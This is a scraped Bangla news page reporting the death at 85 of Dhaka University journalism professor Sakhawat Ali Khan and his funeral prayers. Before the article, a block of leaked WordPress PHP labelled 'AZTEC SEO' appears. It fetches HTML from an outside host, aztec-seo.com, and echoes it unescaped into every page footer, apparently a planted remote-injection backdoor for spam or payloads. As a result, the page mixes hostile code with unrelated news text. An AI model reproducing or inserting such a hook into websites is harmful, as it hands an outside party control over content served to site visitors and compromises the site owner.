/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); সাংবাদিকতার শিক্ষক অধ্যাপক সাখাওয়াত আলী খান আর নেই, জানাজা সম্পন্ন | Dhaka Sky News

প্রধানমন্ত্রীর নির্দেশনা, জাকাত ব্যবস্থাপনাকে আরও কার্যকর করার উপায় বের করুন

আগের সংবাদ

পুলিশের ৫ কর্মকর্তাকে বাধ্যতামূলক অবসর

পরের সংবাদ

সাংবাদিকতার শিক্ষক অধ্যাপক সাখাওয়াত আলী খান আর নেই, জানাজা সম্পন্ন


সাংবাদিকতা ও গণমাধ্যম শিক্ষার অন্যতম পথিকৃৎ, ঢাকা বিশ্ববিদ্যালয়ের গণযোগাযোগ ও সাংবাদিকতা বিভাগের অধ্যাপক সাখাওয়াত আলী খান ইন্তেকাল করেছেন (ইন্না লিল্লাহি ওয়া ইন্না ইলাইহি রাজিউন)। রাজধানীর বেসরকারি একটি হাসপাতালে রোববার রাতে তাঁর মৃত্যু হয় বলে বিভাগের সহযোগী অধ্যাপক শাওন্তী হায়দার জানিয়েছেন। তাঁর বয়স হয়েছিল ৮৫ বছর। তিনি স্ত্রী, এক মেয়ে, এক ছেলে, দুই নাতিসহ বহু গুণগ্রাহী ও ছাত্রছাত্রী রেখে গেছেন।
সোমবার বেলা সাড়ে ১০টায় ঢাকা বিশ্ববিদ্যালয়ের কেন্দ্রীয় জামে মসজিদে তাঁর জানাজা অনুষ্ঠিত হয়। জানাজায় ঢাকা বিশ্ববিদ্যালয়ের উপাচার্য অধ্যাপক নিয়াজ আহমদ খান, উপ-উপাচার্য (শিক্ষা) অধ্যাপক মামুন আহমেদ ও গণযোগাযোগ ও সাংবাদিকতা বিভাগের শিক্ষক- শিক্ষার্থীরাসহ আরও অনেকে উপস্থিত ছিলেন।
জানাজা শেষে ঢাকা বিশ্ববিদ্যালয় উপাচার্য নিয়াজ আহমেদ খান বলেন, অধ্যাপক সাখাওয়াত আলী খানের স্মৃতি বিশ্ববিদ্যালয় জাগ্রত রাখতে চায়। অধ্যাপক সাখাওয়াত আলী খানের মরদেহ দাফন করা হবে নরসিংদীর শিবপুর উপজেলার ধানুয়া গ্রামে।
জানা গেছে, ১২ ফেব্রুয়ারি সাখাওয়াত আলী খানের স্ট্রোক হয়। তখন কয়েক দিন হাসপাতালে চিকিৎসা শেষে তাকে বাসায় নেওয়া হয়। এর মধ্যে রোববার রাতে তিনি আবার অসুস্থ হয়ে পড়ায় হাসপাতালে নেওয়া হলে চিকিৎসক মৃত ঘোষণা করা হয়।